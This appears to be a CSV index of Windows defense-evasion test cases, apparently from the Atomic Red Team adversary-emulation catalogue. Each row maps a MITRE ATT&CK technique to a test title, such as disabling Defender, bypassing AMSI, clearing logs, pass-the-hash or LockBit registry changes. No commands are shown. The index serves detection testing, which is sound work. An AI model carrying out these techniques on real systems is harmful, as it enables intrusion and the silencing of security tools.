defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
